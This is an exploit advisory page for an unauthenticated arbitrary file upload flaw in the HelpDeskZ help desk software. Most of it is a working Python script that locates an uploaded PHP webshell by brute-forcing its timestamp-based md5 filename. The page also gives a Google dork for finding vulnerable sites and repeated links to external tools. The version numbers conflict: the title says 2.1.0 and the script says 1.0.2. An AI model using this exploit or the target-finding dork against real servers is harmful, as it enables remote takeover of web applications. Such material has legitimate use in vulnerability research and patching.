HelpDeskZ 2.1.0 Unauthenticated Arbitrary File Upload

2017.08.19
Credit: Dyar Sahdi
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: HelpDeskZ 2.1.0 Unauthenticated Arbitrary File Upload # Google Dork: intext:"Help Desk Software by HelpDeskZ" # Exploit Author: Dyar Sahdi # Vendor Homepage: https://www.facebook.com/Dyar.Sahdi.Linux # Version: <= v2.1.0 # Tested on: Win7,Linux,win10,win xp ------------------------------------------ --------------------------------------------------------------------------------------------------------------------------------- Exploit Tool:https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350 ------------------------------------------------------------------------------------------------------------------------------------ Tools Link ------------------ 1-https://ghostbin.com/paste/ry5j7 2-https://ghostbin.com/paste/ry5j7 3-https://ghostbin.com/paste/ry5j7 4-https://ghostbin.com/paste/ry5j7 5-https://ghostbin.com/paste/ry5j7 ---------------------------------------- Steps to reproduce: http://localhost/helpdeskz/?v=submit_ticket&action=displayForm ----------------------------------------------------------------------------- Exploit.py ------------------------- import hashlib import time import sys import requests print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit' if len(sys.argv) < 3: print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]) sys.exit(1) helpdeskzBaseUrl = sys.argv[1] fileName = sys.argv[2] currentTime = int(time.time()) for x in range(0, 300): plaintext = fileName + str(currentTime - x) md5hash = hashlib.md5(plaintext).hexdigest() url = helpdeskzBaseUrl+md5hash+'.php' response = requests.head(url) if response.status_code == 200: print "found!" print url sys.exit(0) print "Sorry, I did not find anything" ----------------------------------------- Location: exploit.py http://localhost/helpdeskz/ phpshell.php +++++++++++++++++++++++++++++++++++ Kurdistan Is Not Iraq

References:



Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top